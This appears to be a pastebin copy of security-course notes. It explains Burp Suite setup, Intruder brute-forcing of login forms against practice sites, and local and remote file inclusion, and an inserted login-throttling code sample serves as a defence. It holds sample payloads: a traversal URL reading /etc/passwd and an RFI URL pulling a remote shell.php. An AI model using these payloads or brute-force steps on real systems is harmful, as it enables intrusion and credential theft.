Prabhankar0HS0

burp

Aug 2nd, 2018
Session 14
===========

INTRODUCTION TO BURP SUITE
===========================
Burp Suite is a graphical tool for testing web application security. Burp Scanner can automatically move parameters between different locations, such as URL parameters and cookies, for doing Vulnerability Assessment and Penetration Testing of a web application.

The tool is written in Java and developed by an organization named PortSwigger Security. We also use Burp Suite for tampering with data moving from one node to another.
There are 2 versions of Burp Suite:

= Professional Version, $349.00 per user, per year, with all the functions.
= Community Edition, which is free of cost.


Features of Burp Suite to be discussed:
Spider
Repeater
Intruder
Proxy


BRUTE FORCING USING BURP SUITE
===============================

Brute Force Attack: Brute forcing is a trial-and-error method used by application programs to decode encrypted data such as passwords through exhaustive effort rather than by employing intellectual strategies.

Let us first understand the flaw that makes brute forcing work. Brute forcing works because of a flaw in the filtering on login forms. If there is no extra layer of security and no limit on entering credentials, brute forcing can be done.
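
The limit on entering credentials mentioned above can be sketched as follows. This is an added example, not part of the original notes: `LoginThrottle`, `guesses_checked` and the default thresholds are hypothetical names and values, and the counters are kept in memory for a single process (a real deployment would use a shared store).

```python
import time
from collections import defaultdict, deque

class LoginThrottle:
    """Limit failed logins per account and per client IP (sliding window)."""

    def __init__(self, max_failures=5, window=300, lockout=900, clock=time.monotonic):
        self.max_failures, self.window, self.lockout = max_failures, window, lockout
        self.clock = clock                     # injectable so the logic can be tested
        self._failures = defaultdict(deque)    # key -> times of recent failures
        self._locked_until = {}                # key -> time at which the lock expires

    @staticmethod
    def _keys(username, ip):
        # Normalise the name so "Admin" and "admin " share one counter.
        return ("user", username.strip().lower()), ("ip", ip)

    def allowed(self, username, ip):
        """Call before checking the password; False means reject the attempt."""
        now = self.clock()
        return all(self._locked_until.get(k, 0) <= now for k in self._keys(username, ip))

    def record(self, username, ip, success):
        """Call after the password check with its outcome."""
        now = self.clock()
        user_key, ip_key = self._keys(username, ip)
        if success:
            # Reset the account counter only. Resetting the IP counter would let
            # one valid account refill the budget for guessing other accounts.
            self._failures.pop(user_key, None)
            return
        for key in (user_key, ip_key):
            recent = self._failures[key]
            recent.append(now)
            while recent and recent[0] <= now - self.window:  # expire old failures
                recent.popleft()
            if len(recent) >= self.max_failures:
                self._locked_until[key] = now + self.lockout
                recent.clear()

def guesses_checked(throttle, username, ip, guesses, real_password):
    """Replay constructed guesses; return (guesses that reached the check, success)."""
    checked = 0
    for guess in guesses:
        if not throttle.allowed(username, ip):
            continue                           # rejected before any comparison
        checked += 1
        ok = guess == real_password
        throttle.record(username, ip, ok)
        if ok:
            return checked, True
    return checked, False
```

Per-account lockout can itself be abused to lock out a legitimate user, which is why the lock here is temporary rather than permanent.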

STEPS :
=======

=> Setting up proxy settings in the browser
- Browser Settings > Network Settings > Proxy Configuration > Manual Proxy > Enter a socket on localhost > 127.0.0.1:8080
- Check "Use this proxy server for all protocols".
- Clear all details from "No Proxy for".
- Click on Apply.
For proper functioning, download the certificate from http://burp.
Import the certificate, tick all the options provided and click OK.


Now open Burp Suite:
=> Go to Proxy > Options > Enter the proxy socket that we entered in the browser settings.
=> Click on Intercept > Intercept is ON (this will start capturing moving packets).
On entering the credentials or any request and pressing Enter or OK, the request will go to Burp Suite first before going to the actual page.
So it will keep blinking until you open Burp Suite.
=> Burp Suite has captured a packet. Select the packet containing the credentials in Burp Suite > Right Click > Send to Intruder.
=> Turn off Intercept mode.
=> Go to Intruder > Positions > Clear
=> Select the parameters you want to start brute forcing on.
- Select value of username > Add
- Select value of password > Add

=> Go to Payloads > Set up a wordlist in Payloads > Give a default list of random credentials for logging in to DVWA or demo.testfire.net
=> Select values for payloads
Payload : 1 > dic. file for username.
Payload : 2 > dic. file for password.
=> Options > Grep Match > Clear
=> "Username and/or password incorrect." > Add.
=> Click on "Start Attack"
=> Find out the correct username and password and enter them.



=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=x=

Local File Inclusion (also known as LFI)
==========================================
It is the process of including files that are already locally present on the server by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing directory traversal characters (such as dot-dot-slash) to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

ex: http://vulnerable_host/preview.php?file=../../../../etc/passwd

Remote File Inclusion (also known as RFI)
============================================
It is the process of including remote files by exploiting vulnerable inclusion procedures implemented in the application. This vulnerability occurs, for example, when a page receives, as input, the path to the file that has to be included and this input is not properly sanitized, allowing an external URL to be injected. Although most examples point to vulnerable PHP scripts, we should keep in mind that it is also common in other technologies such as JSP, ASP and others.

ex: www.xyz.com/contacts.php?page=http://www.abc.com/shell.php